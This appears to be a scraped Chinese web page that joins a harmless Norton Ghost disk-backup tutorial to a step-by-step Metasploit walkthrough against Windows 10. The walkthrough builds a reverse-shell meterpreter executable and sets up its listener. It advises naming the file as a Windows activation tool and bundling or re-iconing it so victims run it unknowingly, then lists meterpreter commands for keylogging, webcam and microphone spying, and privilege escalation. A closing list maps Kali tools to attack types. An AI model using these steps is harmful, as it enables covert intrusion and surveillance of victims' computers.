本文目录一览:
什么是ghost phisher?初学者如何使用呢?
Ghost初级使用教程:
Ghost(幽灵)软件美国赛门铁克公司推出款出色硬盘备份还原工具实现FAT16、FAT32、NTFS、OS2等多种硬盘分区格式分区及硬盘备份还原俗称克隆软件。
1、特点:既称之克隆软件说明其Ghost备份还原硬盘扇区单位进行也说硬盘上物理信息完整复制而仅仅数据简单复制;克隆人只能克隆躯体Ghost却能克隆系统所有东东包括声音动画图像连磁盘碎片都帮复制比克隆人还厉害哟:)Ghost支持分区或硬盘直接备份扩展名.gho文件里(赛门铁克把种文件称镜像文件)也支持直接备份另分区或硬盘里。
2、运行ghost:至今止ghost只支持Dos运行环境能说种遗憾:(通常把ghost文件复制启动软盘(U盘)里也其刻录进启动光盘用启动盘进入Dos环境提示符下输入ghost回车即运行ghost首先出现关于界面
按任意键进入ghost操作界面出现ghost菜单主菜单共有4项从下至上分别Quit(退出)、Options(选项)、Peer to Peer(点对对主要用于网络)、Local(本地)般情况下只用Local菜单项其下有三子项:Disk(硬盘备份与还原)、Partition(磁盘分区备份与还原)、 Check(硬盘检测)前两项功能用得多下面操作讲解围绕两项展开
3、由于Ghost备份还原按扇区来进行复制所操作时定要小心要把目标盘(分区)弄错了要目标盘(分区)数据全部抹掉惨……根本没有多少恢复机会所定要认真、细心也要太紧张其实Ghost使用简单弄懂几单词意思会理解用法加上认真态度定掌握起来吧:) 。
二、 分区备份
预备知识:认识单词
Disk:用说也知道磁盘意思;
Partition:即分区操作系统里每硬盘盘符(C盘)对应着分区;
Image:镜像镜像Ghost种存放硬盘或分区内容文件格式扩展名.gho;
To:ghost里简单理解to即备份意思;
From:从ghost里简单理解from即从……还原意思
() Partition菜单简介
其下有三子菜单:
To Partion:分区(称源分区)直接复制另分区(目标分区)注意操作时目标分区空间能小于源分区;
To Image:分区备份镜像文件注意存放镜像文件分区能比源分区小好比源分区大;
From Image:从镜像文件恢复分区(备份分区还原)
(二) 分区镜像文件制作
1、 运行ghost用光标方向键光标从Local经Disk、Partition移动To Image菜单项上按回车
2、 出现选择本地硬盘窗口再按回车键
3、 出现选择源分区窗口(源分区要把制作成镜像文件分区)
用上下光标键蓝色光条定位要制作镜像文件分区上按回车键确认要选择源分区再按下Tab键光标定位OK键上(此时OK键变白色)再按回车键
4、 进入镜像文件存储目录默认存储目录ghost文件所目录File name处输入镜像文件文件名也带路径输入文件名(此时要保证输入路径存否则会提示非法路径)输入D:\sysbak\cwin98表示镜像文件cwin98.gho保存D:\sysbak目录下输好文件名再回车
5、 接着出现否要压缩镜像文件窗口有No(压缩)、Fast(快速压缩)、High(高压缩比压缩)压缩比越低保存速度越快般选Fast即用向右光标方向键移动Fast上回车确定;
6、 接着又出现提示窗口用光标方向键移动Yes上回车确定
7、 Ghost开始制作镜像文件
8、 建立镜像文件成功会出现提示创建成功窗口
回车即回Ghost界面;
9、 再按Q键回车即退出ghost
至此分区镜像文件制作完毕 也蛮简单嘛:)。
三、 从镜像文件还原分区
制作好镜像文件系统崩溃还原样又能恢复制作镜像文件时系统状态下面介绍镜像文件还原
()DOS状态下进入Ghost所目录输入Ghost回车即运行Ghost
(二)出现Ghost主菜单用光标方向键移动菜单Local-Partition-From Image回车
(三) 出现镜像文件还原位置窗口File name处输入镜像文件完整路径及文件名(也用光标方向键配合Tab键分别选择镜像文件所路径、输入文件名比较麻烦)d:\sysbak\cwin98.gho再回车
(四) 出现从镜像文件选择源分区窗口直接回车
(五) 又出现选择本地硬盘窗口再回车
(六) 出现选择从硬盘选择目标分区窗口用光标键选择目标分区(即要还原哪分区)回车
(七) 出现提问窗口选Yes回车确定ghost开始还原分区信息
(八) 快还原完毕出现还原完毕窗口选Reset Computer回车重启电脑
现完成了分区恢复快呀:)
注意:选择目标分区时定要注意选对否则:目标分区原来数据全部消失。
四、 硬盘备份及还原
GhostDisk菜单下子菜单项实现硬盘硬盘直接对拷(Disk-To Disk)、硬盘镜像文件(Disk-To Image)、从镜像文件还原硬盘内容(Disk-From Image)
多台电脑配置完全相同情况下先台电脑上安装好操作系统及软件用ghost硬盘对拷功能系统完整地复制份其电脑样装操作系统比传统方法快多了哦:)
GhostDisk菜单各项使用与Partition大同小异而且使用也多此赘述了。
五、 Ghost使用方案
1、佳方案:完成操作系统及各种驱动安装常用软件(杀毒、媒体播放软件、office办公软件等)安装系统所盘接着安装操作系统和常用软件各种升级补丁优化系统用启动盘启动Dos下做系统盘克隆备份了注意备份盘大小能小于系统盘
2、因疏忽装好系统段间才想起要克隆备份也没关系备份前好先系统盘里垃圾文件清除注册表里垃圾信息清除(推荐用Windows优化大师)整理系统盘磁盘碎片整理完成Dos下进行克隆备份。
3、情况下该恢复克隆备份
当感觉系统运行缓慢时(此时多半由于经常安装卸载软件残留或误删了些文件导致系统紊乱)、系统崩溃时、了比较难杀除病毒时要进行克隆还原了有时长时间没整理磁盘碎片又想花上半小时甚至更长时间整理时也直接恢复克隆备份样比单纯整理磁盘碎片效要好得多。
4、强调:备份还原时定要注意选对目标硬盘或分区"。
kali怎么攻击网站
kali是靠指令攻击的,kali是一个系统,做黑客的基本都会把kali用的很熟练,另外,不叫攻击,叫审计,希望上面的回答可以帮助到你,谢谢
Kali利用msf渗透Windows电脑(超详细)
前言
最近整理了一些 奇安信华为深信服大佬 的课件资料+大厂面试课题,想要的可以私信自取, 无偿赠送 给粉丝朋友~
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
演示环境
使用Kali 2021.3进行演示操作
目标靶机: Win10专业版
软件:msfvenom、msfconsole(Kali系统内置)
1.进入管理员模式
命令: sudo su
解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令
命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe
解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写Win10激活工具,可能更容易让目标主机上钩
当然MSF也可以用来渗透手机、mac、Linux等
接下来运行命令生成文件
默认生成的文件在根目录下
把刚才生成的文件放到目标靶机Win10系统中
命令: msfconsole
(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)
(4)命令: set lport 1111(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit -z -j(后台执行)
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面
(1)命令: sessions (查看上钩的用户)
(2)命令: sessions -i 1 (选择需要攻击的用户,这里选择第 1 个
命令: run vnc -i
cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本
————————————————
原文链接:
kali的攻击方法有哪些
Kali上的工具相当多,安装攻击方法分类如下:
如果是Web注入攻击,用Owasp ZAP和Sqlmap;
如果是缓存溢出漏洞攻击获得远程shell,用Metasploit;
如果是社会工程学攻击,用SET工具;
如果是ARP欺骗,用ettercap、arpspoof。